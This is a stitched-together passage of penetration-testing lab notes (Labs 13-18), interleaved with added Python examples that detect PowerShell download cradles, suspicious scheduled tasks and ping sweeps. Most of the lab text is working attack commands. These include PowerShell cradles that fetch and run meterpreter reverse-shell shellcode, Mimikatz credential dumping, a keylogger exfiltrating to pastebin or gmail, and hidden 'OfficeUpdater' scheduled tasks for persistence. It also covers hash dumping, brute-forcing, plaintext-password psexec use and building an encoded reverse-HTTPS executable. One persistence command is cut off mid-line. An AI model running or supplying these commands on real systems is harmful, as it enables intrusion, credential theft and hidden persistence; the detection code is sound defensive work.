powershell -command "IEX (New-Object Net.WebClient).DownloadString('https://s3.amazonaws.com/StrategicSec-Files/Powersploit/Invoke-Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 10.10.5.235 -Lport 443 -Force"
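The download cradles used throughout Lab 13 (IEX plus DownloadString, -ExecutionPolicy Bypass, scripts launched out of %TEMP%) are exactly the features a detection engineer keys on in process-creation telemetry. The block below is an added example and is not part of the course material: it scores PowerShell command lines from a constructed process-creation log and reports the ones that stack several cradle indicators. The `timestamp | user | image | command line` layout, the indicator weights and the sample records are all assumptions made for the example, not any product's format.

```python
import re
from dataclasses import dataclass, field

# Constructed process-creation records for the example (not real telemetry).
# Layout assumed here: "<timestamp> | <user> | <image path> | <command line>".
SAMPLE_LOG = """\
2014-06-01T10:01:02Z | CORP\\alice | C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe | powershell -command "IEX (New-Object Net.WebClient).DownloadString('http://10.10.5.235/PowerSploit/Exfiltration/Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
2014-06-01T10:03:45Z | CORP\\bob | C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe | powershell.exe -ExecutionPolicy Bypass -command C:\\Users\\bob\\AppData\\Local\\Temp\\Get-Information.ps1
2014-06-01T10:05:11Z | NT AUTHORITY\\SYSTEM | C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe | powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://10.10.5.235:8080/kBBldxiub6''))'
2014-06-01T10:07:30Z | CORP\\carol | C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe | powershell.exe -File C:\\Scripts\\Get-DiskReport.ps1
2014-06-01T10:09:00Z | CORP\\dave | C:\\Windows\\System32\\cmd.exe | cmd.exe /c dir
"""

# (indicator name, pattern, weight). The weights are a judgement call for this
# example: fetching and evaluating remote code counts most, quiet-mode switches
# count less on their own. The "-e <base64>" rule can false-positive and is
# only worth its weight together with other hits.
INDICATORS = [
    ("download-cradle", re.compile(r"\bDownload(String|File|Data)\s*\(", re.I), 3),
    ("invoke-expression", re.compile(r"\b(IEX|Invoke-Expression)\b", re.I), 2),
    ("webclient", re.compile(r"New-Object\s+(System\.)?Net\.WebClient", re.I), 1),
    ("execution-policy-bypass", re.compile(r"-(ExecutionPolicy|ep|ex|exec)\s+bypass", re.I), 2),
    ("hidden-window", re.compile(r"-(WindowStyle|w)\s+hidden", re.I), 2),
    ("no-profile", re.compile(r"-(NoProfile|nop)\b", re.I), 1),
    ("non-interactive", re.compile(r"-(NonInteractive|noni)\b", re.I), 1),
    ("encoded-command", re.compile(r"-(EncodedCommand|enc|ec|e)\s+[A-Za-z0-9+/=]{20,}", re.I), 3),
    ("script-from-temp", re.compile(r"\\Temp\\[^\s'\"]+\.ps1", re.I), 1),
    ("raw-ip-url", re.compile(r"https?://\d{1,3}(\.\d{1,3}){3}", re.I), 1),
]


@dataclass
class Finding:
    timestamp: str
    user: str
    score: int
    indicators: list = field(default_factory=list)


def parse_record(line):
    """Split one assumed-layout record into its four fields, or None if malformed."""
    parts = [p.strip() for p in line.split(" | ", 3)]
    if len(parts) != 4:
        return None
    return dict(zip(("timestamp", "user", "image", "cmdline"), parts))


def score_command_line(cmdline):
    """Return (total weight, [matched indicator names]) for one command line."""
    hits, score = [], 0
    for name, pattern, weight in INDICATORS:
        if pattern.search(cmdline):
            hits.append(name)
            score += weight
    return score, hits


def scan_log(text, threshold=3):
    """Return a Finding for every powershell.exe launch scoring at or above threshold."""
    findings = []
    for line in text.splitlines():
        rec = parse_record(line)
        if rec is None or not rec["image"].lower().endswith("powershell.exe"):
            continue
        score, hits = score_command_line(rec["cmdline"])
        if score >= threshold:
            findings.append(Finding(rec["timestamp"], rec["user"], score, hits))
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f.timestamp} {f.user:<22} score={f.score:<3} {', '.join(f.indicators)}")
```

With the default threshold the scan flags the Mimikatz cradle, the script run from %TEMP% under an execution-policy bypass, and the hidden SYSTEM-context cradle, while the plain `-File C:\Scripts\...` launch scores zero; raising the threshold trims the list to the highest-scoring entries.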


Lab 13b: Payload which could execute shellcode from DNS TXT queries.

powershell.exe (new-object System.Net.WebClient).DownloadFile('http://10.10.5.235/nishang/Execute-DNSTXT-Code.ps1','%TEMP%\Execute-DNSTXT-Code.ps1')

powershell.exe -ExecutionPolicy Bypass -command %TEMP%\Execute-DNSTXT-Code.ps1 32.alteredsecurity.com 64.alteredsecurity.com ns8.zoneedit.com

(113)

Strategic Security, Inc. © http://strategicsec.com/

Lab 13c: Run mimikatz via powershell (must be run as SYSTEM)

powershell "IEX (New-Object Net.WebClient).DownloadString('http://10.10.5.235/PowerSploit/Exfiltration/Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"


Lab 13d: Token Manipulation to escalate (must be run as an Administrator)

powershell -command "IEX (New-Object Net.WebClient).DownloadString('http://10.10.5.235/PowerSploit/Exfiltration/Invoke-TokenManipulation.ps1') ; Invoke-TokenManipulation"


Lab 13e: Nishang payload which scans IP addresses, ports and hostnames

powershell.exe (new-object System.Net.WebClient).DownloadFile('http://10.10.5.235/nishang/Invoke-PingSweep.ps1','%TEMP%\Invoke-PingSweep.ps1')

powershell.exe -ExecutionPolicy Bypass -command %TEMP%\Invoke-PingSweep.ps1 -StartAddress 10.10.30.50 -EndAddress 10.10.30.100 -ResolveHost -ScanPort


Lab 13f: Nishang Payload which gathers juicy information from the target.

powershell.exe (new-object System.Net.WebClient).DownloadFile('http://10.10.5.235/nishang/Get-Information.ps1','%TEMP%\Get-Information.ps1')

powershell.exe -ExecutionPolicy Bypass -command %TEMP%\Get-Information.ps1


powershell.exe (new-object System.Net.WebClient).DownloadFile('http://10.10.5.235/nishang/Keylogger.ps1','%TEMP%\Keylogger.ps1')

powershell.exe -ExecutionPolicy Bypass -command %TEMP%\Keylogger.ps1 <dev_key> <username> <pass> 3 http://example.com stopthis

.PARAMETER dev_key
The unique API key provided by pastebin when you register a free account. Unused for tinypaste. Unused for the gmail option.

.PARAMETER username
Username for the pastebin account where data would be pasted. Username for the tinypaste account where data would be pasted. Username for the gmail account where data would be sent as an attachment.

.PARAMETER password
Password for the pastebin account where data would be pasted. Password for the tinypaste account where data would be pasted. Password for the gmail account where data would be sent.

.PARAMETER keyoutoption
The method you want to use for exfiltration of data: "0" for displaying on console, "1" for pastebin, "2" for gmail, "3" for tinypaste.

.PARAMETER MagicString
The string which, when found at CheckURL, will stop the keylogger.

.PARAMETER CheckURL


Lab 13h: Nishang Payload which silently browses to a URL and accepts Java Applet Run Warning

(msfconsole 1)

use exploit/multi/browser/java_signed_applet
set SRVHOST 10.10.5.235
set URIPATH strategicsec
exploit

(msfconsole 2)

powershell.exe (new-object System.Net.WebClient).DownloadFile('http://10.10.5.235/nishang/Browse_Accept_Applet.ps1','%TEMP%\Browse_Accept_Applet.ps1')

powershell.exe -ExecutionPolicy Bypass -command %TEMP%\Browse_Accept_Applet.ps1 http://10.10.5.235:8080/strategicsec


powershell.exe (new-object System.Net.WebClient).DownloadFile('http://StrategicSec-Ubuntu-VM-Tap0-IP/nishang/Get-WLAN-Keys.ps1','%TEMP%\Get-WLAN-Keys.ps1')


This script is a part of Nishang. It copies a file from an NTFS-partitioned volume by reading the raw volume and parsing the NTFS structures. This bypasses file DACLs, read handle locks, and SACLs. You must be an administrator (elevated privileges) to run the script. This can be used to read SYSTEM files which are normally locked, such as the NTDS.dit file or registry hives.

powershell.exe (new-object System.Net.WebClient).DownloadFile('http://10.10.5.235/nishang/Invoke-NinjaCopy.ps1','%TEMP%\Invoke-NinjaCopy.ps1')

powershell.exe -ExecutionPolicy Bypass -command %TEMP%\Invoke-NinjaCopy.ps1 -path c:\windows\system32\config\system -localdestination %TEMP%\system

Nishang payload which dumps password hashes

powershell.exe (new-object System.Net.WebClient).DownloadFile('http://10.10.5.235/nishang/Get-PassHashes.ps1','%TEMP%\Get-PassHashes.ps1')

powershell.exe -ExecutionPolicy Bypass -command %TEMP%\Get-PassHashes.ps1

powershell.exe (new-object System.Net.WebClient).DownloadFile('http://10.10.5.235/nishang/Remove-Update.ps1','%TEMP%\Remove-Update.ps1')

powershell.exe -ExecutionPolicy Bypass -command %TEMP%\Remove-Update.ps1 KB222222

Nishang payload which performs a Brute-Force Attack against SQL Server, Active Directory, Web and FTP

powershell.exe (new-object System.Net.WebClient).DownloadFile('http://10.10.5.235/nishang/Brute-Force.ps1','%TEMP%\Brute-Force.ps1')

powershell.exe -ExecutionPolicy Bypass -command %TEMP%\Brute-Force.ps1 -Identity ftp://10.10.5.235 -Service FTP

Nishang payload which performs a Brute-Force Attack against SQL Server, Active Directory, Web and FTP.

powershell.exe (new-object System.Net.WebClient).DownloadFile('http://10.10.5.235/nishang/Invoke-Medusa.ps1','%TEMP%\Invoke-Medusa.ps1')

powershell.exe -ExecutionPolicy Bypass -command %TEMP%\Invoke-Medusa.ps1 -Identity ftp://10.10.5.235 -UserName anonymous -Password 1 -Service FTP

#(X86) - On User Login

schtasks /create /tn OfficeUpdaterA /tr "c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring (''http://StrategicSec-Ubuntu-Tap0-IP:8080/kBBldxiub6'''))'" /sc onlogon /ru System

#(X86) - On System Start

schtasks /create /tn OfficeUpdaterB /tr "c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring (''http://StrategicSec-Ubuntu-Tap0-IP:8080/kBBldxiub6'''))'" /sc onstart /ru System


#(X86) - On User Idle (30mins)

schtasks /create /tn OfficeUpdaterC /tr "c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring (''http://StrategicSec-Ubuntu-Tap0-IP:8080/kBBldxiub6'''))'" /sc onidle /i 30

#(X64) - On User Login

schtasks /create /tn OfficeUpdaterA /tr "c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring (''http://StrategicSec-Ubuntu-Tap0-IP:8080/kBBldxiub6'''))'" /sc onlogon /ru System

schtasks /create /tn OfficeUpdaterB /tr "c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring (''http://StrategicSec-Ubuntu-Tap0-IP:8080/kBBldxiub6'''))'" /sc onstart /ru System

#(X64) - On User Idle (30mins)

schtasks /create /tn OfficeUpdaterC /tr "c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object
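Every task created above has the same shape from a defender's point of view: a benign-looking name, a logon/start/idle trigger, a SYSTEM run-as context set by an ordinary user, and an action that launches a hidden PowerShell that fetches code from a URL. An administrator auditing a host would export `schtasks /query /fo CSV /v` and score each row on those attributes. The block below is an added example, not from the course or from any product: the CSV is constructed, keeps only six of the many columns the real verbose output carries, and the trigger strings, column names and weights are assumptions made for the example.

```python
import csv
import io
import re

# Constructed sample: six of the columns that `schtasks /query /fo CSV /v`
# emits, with made-up tasks. Not captured from any real host.
SAMPLE_TASKS_CSV = '''"HostName","TaskName","Author","Task To Run","Schedule Type","Run As User"
"WS01","\\Microsoft\\Windows\\Defrag\\ScheduledDefrag","Microsoft Corporation","%windir%\\system32\\defrag.exe -c -h -o -$","Monthly","SYSTEM"
"WS01","\\OfficeUpdaterA","CORP\\alice","c:\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://10.10.5.235:8080/kBBldxiub6''))'","At logon time","SYSTEM"
"WS01","\\OfficeUpdaterC","CORP\\alice","c:\\windows\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://10.10.5.235:8080/kBBldxiub6''))'","At idle time","CORP\\alice"
"WS01","\\Backup\\NightlyExport","CORP\\svc_backup","C:\\Program Files\\Backup\\export.exe /nightly","Daily","CORP\\svc_backup"
"WS01","\\Maint\\DiskReport","CORP\\admin","powershell.exe -File C:\\Scripts\\Get-DiskReport.ps1","Weekly","CORP\\admin"
'''

# Run-as identities that mean "task executes with full local privilege".
HIGH_PRIV = {"SYSTEM", "NT AUTHORITY\\SYSTEM", "LOCALSYSTEM"}
# Trigger types (lower-cased) that give an attacker re-execution without a clock.
PERSISTENCE_TRIGGERS = {"at logon time", "at system start up", "at idle time", "on event"}
SCRIPT_HOST = re.compile(r"\b(powershell|pwsh|cmd|wscript|cscript|mshta|rundll32|regsvr32)(\.exe)?\b", re.I)
URL_IN_ACTION = re.compile(r"https?://", re.I)
STEALTH_FLAGS = re.compile(r"-(WindowStyle|w)\s+hidden|-(ExecutionPolicy|ep|ex|exec)\s+bypass", re.I)


def audit_tasks(csv_text, threshold=4):
    """Score every task row; return those at or above threshold, in file order."""
    findings = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        score, reasons = 0, []
        action = row["Task To Run"]
        run_as = row["Run As User"].strip().upper()
        author = row["Author"].strip()
        trigger = row["Schedule Type"].strip().lower()
        # A user-authored task that runs as SYSTEM is a privilege boundary crossing.
        if run_as in HIGH_PRIV and not author.lower().startswith("microsoft"):
            score += 2
            reasons.append(f"runs as {run_as} but was authored by {author}")
        if trigger in PERSISTENCE_TRIGGERS:
            score += 1
            reasons.append(f"persistence-style trigger: {trigger}")
        if SCRIPT_HOST.search(action):
            score += 1
            reasons.append("action launches a script host")
        if URL_IN_ACTION.search(action):
            score += 2
            reasons.append("action pulls content from a URL")
        if STEALTH_FLAGS.search(action):
            score += 2
            reasons.append("hidden window or execution-policy bypass")
        if score >= threshold:
            findings.append({"host": row["HostName"], "task": row["TaskName"],
                             "score": score, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit_tasks(SAMPLE_TASKS_CSV):
        print(f"{f['host']} {f['task']} score={f['score']}")
        for r in f["reasons"]:
            print("   -", r)
```

The Microsoft-authored defrag task and the backup job score zero, the weekly admin report scores one for merely using PowerShell, and the two OfficeUpdater tasks are the only rows that clear the threshold; the SYSTEM-context one scores highest because it combines all five signals.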


Use exploit/windows/misc/psh_web_delivery (fill required information)

open second console
cd /var/www
sudo wget http://10.10.5.235:8080/strategicsec32
sudo cp strategicsec32 strategicsec64

powershell.exe -w hidden -nop -ep bypass -c "IEX ((new-object net.webclient).downloadstring('http://<ip>/payload1'))"

Use base64 and encode it to avoid IEX evaluating inline:

%WINDIR%\syswow64\WindowsPowerShell\v1.0\powershell.exe -w hidden -nop -ep bypass -c "IEX ((new-object net.webclient).downloadstring('http://<ip>/payload2'))"

(example)

Place if statement in payload1 (strategicsec32):

Set-StrictMode -Version 2
if ($env:Processor_Architecture -ne "x86") {
    cmd /c ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(("JVdJTkRJUiVcc3lzd29 3NjRcV2luZG93c1Bvd2VyU2hlbGxcdjEuMFxwb3dlcnNoZWxsLmV4ZSAtdyBoaWRkZW4gLW5vcCAtZXA gYnlwYXNzIC1jICJJRVggKChuZXctb2JqZWN0IG5ldC53ZWJjbGllbnQpLmRvd25sb2Fkc3RyaW5nKCdod HRwOi8vMTAuMTAuNS4yMzUvc3RyYXRlZ2ljc2VjNjQnKSki"))))
    exit
}


Lab 15: Host Enumeration


gpresult /z

List OS Version: ver

reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion" /v ProductName

net start


View the list of started processes and their respective owner: tasklist /v

Kill a process by name: taskkill /F /IM "cmd.exe"

List the software installed on the system: reg query HKLM\Software


List Mounted Devices: fsutil fsinfo drives


List Most Recently Run Commands:

c:\reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"

Check for Autorun:


reg.exe query HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall /S

reg.exe query HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\ /S

reg.exe query HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ /S


At


Lab 16: Credential Harvesting & Data-Mining

meterpreter > getsystem
meterpreter > load mimikatz
meterpreter > kerberos


meterpreter > mimikatz_command -f sekurlsa::logonPasswords -a "full"

meterpreter > msv <-- Your AD password


meterpreter > tspkg <-- Your AD password

meterpreter > wdigest <-- Your AD password

meterpreter > mimikatz_command -f crypto::listStores
meterpreter > mimikatz_command -f crypto::listCertificates
meterpreter > mimikatz_command -f crypto::exportCertificates
meterpreter > mimikatz_command -f crypto::patchcapi


meterpreter> search -d <directory> -f <file-pattern>

Data Mining The Host

meterpreter> execute -c -H -f cmd -a "/k" -i <--- Switch to command shell

Search the drive and sort the files by time accessed

c:\dir C:\ /S /OD /TA


Search the drive and sort the files by time created

c:\dir C:\ /S /OD /TC

Search the drive and sort the files by time written

c:\dir C:\ /S /OD /TW

Search the drive for files with business critical names or important file types

c:\dir c:\*bank* /s


c:\dir c:\*password* /s


c:\dir c:\*competitor* /s

c:\dir c:\*finance* /s
c:\dir c:\*invoice* /s
c:\dir c:\*risk* /s
c:\dir c:\*assessment* /s
c:\dir c:\*key* /s
c:\dir c:\*.vsd /s
c:\dir c:\*.pcf /s
c:\dir c:\*.ica /s
c:\dir c:\*.crt /s
c:\dir c:\*.key /s
c:\dir c:\*.log /s

Search the drive for files with critical data in them

c:\type c:\sysprep.inf
c:\type c:\sysprep\sysprep.xml
c:\findstr /I /N /S /P /C:password *
c:\findstr /I /N /S /P /C:secret *
c:\findstr /I /N /S /P /C:confidential *
c:\findstr /I /N /S /P /C:account *
c:\findstr /I /N /S /P /C:payroll *
c:\findstr /I /N /S /P /C:credit *


c:\findstr /I /N /S /P /C:record *

Active Directory Enumeration

meterpreter> execute -c -H -f cmd -a "/k" -i <--- Switch to command shell

c:\net view


c:\net view /domain

c:\net user


c:\net localgroup


c:\net localgroup administrators

c:\net localgroup administrators /domain


net user "jima" /domain

echo %logonserver:*\\=%


c:\dsquery user -name * -limit 1000

Increasing dsquery limit


c:\dsquery group

Listing all of the groups on a machine

c:\dsquery group "<distinguished name>"

Listing all of the groups on a machine

Useful Resource Kit Tools ---


Find out which OU a user account resides

c:\dsquery user -samid user_name

List all domain users


All info about user "yoy"

c:\dsquery * -filter "(&(objectcategory=person)(objectclass=user)(samaccountname=yoy))" -limit 0 -attr *

Query Groups

c:\dsquery * -filter "(&(objectcategory=group)(objectclass=group)(name=*))" -limit 0 -attr Name

c:\dsquery * -filter "(&(objectcategory=group)(objectclass=group)(name=Users))" -limit 0 -attr *


Lab 17: Life without metasploit

echo @echo off > pingsweep.bat

echo for %%a in (1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254) do ping -n 2 -w 2000 %1.%%a >> pingsweep.bat pingsweep.bat

more


for /L %i in (1,1,255) do @echo 10.10.30.%i >> ips.txt
more ips.txt
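The batch ping sweep above leaves a very recognisable pattern on the wire: one source sending ICMP echo requests to a run of consecutive addresses, two per host (`ping -n 2`), in a short period. A network defender catches that by counting distinct ICMP destinations per source inside a sliding time window. The following is an added example and not part of the course: it builds constructed flow records in memory (the `<timestamp> <proto> <src> -> <dst> <detail>` layout, the addresses and the thresholds are all assumptions made for the example) and reports any source whose distinct-destination count inside a 60-second window reaches the limit.

```python
from collections import Counter, defaultdict
from datetime import datetime, timedelta

TS_FMT = "%Y-%m-%dT%H:%M:%SZ"


def build_sample_flows():
    """Constructed flow records for the example (not captured traffic).

    One host sweeps 10.10.30.1-40 with two echo requests per address, four
    seconds per host (the ping -n 2 -w 2000 pattern with no replies), a
    monitoring box pings three servers every 30 s, and a few TCP flows are
    mixed in so the ICMP filter has something to ignore."""
    base = datetime(2014, 6, 1, 10, 0, 0)
    lines = []
    for i in range(40):
        for offset in (0, 2):
            ts = base + timedelta(seconds=4 * i + offset)
            lines.append(f"{ts.strftime(TS_FMT)} ICMP 10.10.30.50 -> 10.10.30.{i + 1} type=8")
    for n in range(6):
        for dst in ("10.10.30.1", "10.10.30.2", "10.10.30.3"):
            ts = base + timedelta(seconds=30 * n)
            lines.append(f"{ts.strftime(TS_FMT)} ICMP 10.10.30.10 -> {dst} type=8")
    for n in range(5):
        ts = base + timedelta(seconds=7 * n)
        lines.append(f"{ts.strftime(TS_FMT)} TCP 10.10.30.20 -> 10.10.30.89 dport=445")
    return lines


def parse_flow(line):
    """Return (timestamp, protocol, source, destination) from one assumed-layout record."""
    ts, proto, src, _arrow, dst = line.split()[:5]
    return datetime.strptime(ts, TS_FMT), proto, src, dst


def detect_sweeps(lines, window=timedelta(seconds=60), min_hosts=10):
    """Return sorted (source, peak distinct ICMP destinations) pairs for every
    source that reached min_hosts distinct destinations inside any window."""
    by_src = defaultdict(list)
    for line in lines:
        ts, proto, src, dst = parse_flow(line)
        if proto == "ICMP":
            by_src[src].append((ts, dst))

    alerts = []
    for src, events in by_src.items():
        events.sort()                 # records may arrive out of order
        live = Counter()              # destinations currently inside the window
        start, best = 0, 0
        for ts, dst in events:
            live[dst] += 1
            # Slide the window forward, dropping events older than `window`.
            while ts - events[start][0] > window:
                old = events[start][1]
                live[old] -= 1
                if live[old] == 0:
                    del live[old]
                start += 1
            best = max(best, len(live))
        if best >= min_hosts:
            alerts.append((src, best))
    return sorted(alerts)


if __name__ == "__main__":
    for src, hosts in detect_sweeps(build_sample_flows()):
        print(f"possible ICMP sweep from {src}: {hosts} distinct hosts within 60 s")
```

With the sample data the sweeping host peaks at 16 distinct destinations inside a 60-second window (60 s at four seconds per host), while the monitoring box never exceeds three, so only the sweep is reported at the default threshold; the threshold and window are the knobs to tune against real baseline traffic.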


echo jima >> names.txt
echo roge >> names.txt
echo patr >> names.txt
echo jami >> names.txt
echo bonn >> names.txt
echo rhon >> names.txt
echo sall >> names.txt
echo joyj >> names.txt
echo laur >> names.txt
echo sloa >> names.txt
echo Administrator >> names.txt
more names.txt


PSExec to a machine that you want to connect to

PSExec in Windows

c:\psexec.exe /accepteula \\10.10.30.81 -u administrator -p P@ssw0rd4321! cmd.exe

PSExec in Linux

cd ~/toolz

wget https://s3.amazonaws.com/StrategicSec-Files/winexe chmod 777 winexe


How many users are logged on/connected to a server?

NET SESSION | FIND /C "\\"

Map a drive to what you want to become your staging server

net use O: \\10.10.30.89\c$ /u:administrator P@ssw0rd4321!
net use /d O:

Which updates were installed on this computer?

Windows 7/8 (note: DISM will return far more details than WMIC.):

c:\DISM /Online /Get-Packages


or:


Lab 18: Setting up your second entry

sudo add-apt-repository ppa:tobydox/mingw


cd /home/strategicsec/toolz/metasploit
touch ./met_template.c


./msfpayload windows/meterpreter/reverse_https LHOST=10.10.5.234 LPORT=443 EXITFUNC=thread R | ./msfencode -c 5 -e x86/shikata_ga_nai > payload


sed --in-place -e 's/\ +//' ./payload
cat payload


cat /dev/urandom | tr -dc A-Za-z0-9 | head -c512 > random
cat random

vi win-met-rev-https.c

/opt/mingw32/bin/i686-w64-mingw32-gcc ./win-met-rev-https.c -o ./win-met-rev-https.exe
chmod 777 ./win-met-rev-https.exe

cp /home/strategicsec/toolz/metasploit/win-met-rev-https.exe /var/www/
exit
